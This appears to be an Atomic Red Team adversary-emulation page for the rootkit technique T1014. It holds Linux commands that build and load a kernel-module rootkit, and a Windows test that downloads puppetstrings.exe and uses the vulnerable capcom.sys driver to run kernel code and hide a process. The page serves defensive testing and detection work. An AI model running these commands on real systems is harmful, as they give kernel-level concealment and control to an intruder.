Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
Loadable Kernel Module based Rootkit
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko |
| rootkit_name | Module name | String | T1014 |
| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014 |
sudo insmod #{rootkit_path}sudo rmmod #{rootkit_name}if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}Loadable Kernel Module based Rootkit
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux |
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko |
| rootkit_name | Module name | String | T1014 |
| temp_folder | Temp folder used to compile the code. Used when prerequistes are fetched. | path | /tmp/T1014 |
sudo modprobe #{rootkit_name}sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -aif [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{rootkit_source_path}/* #{temp_folder}/
cd #{temp_folder}; make
sudo cp #{temp_folder}/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
sudo depmod -aThis test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys |
| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe |
#{puppetstrings_path} #{driver_path}if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}"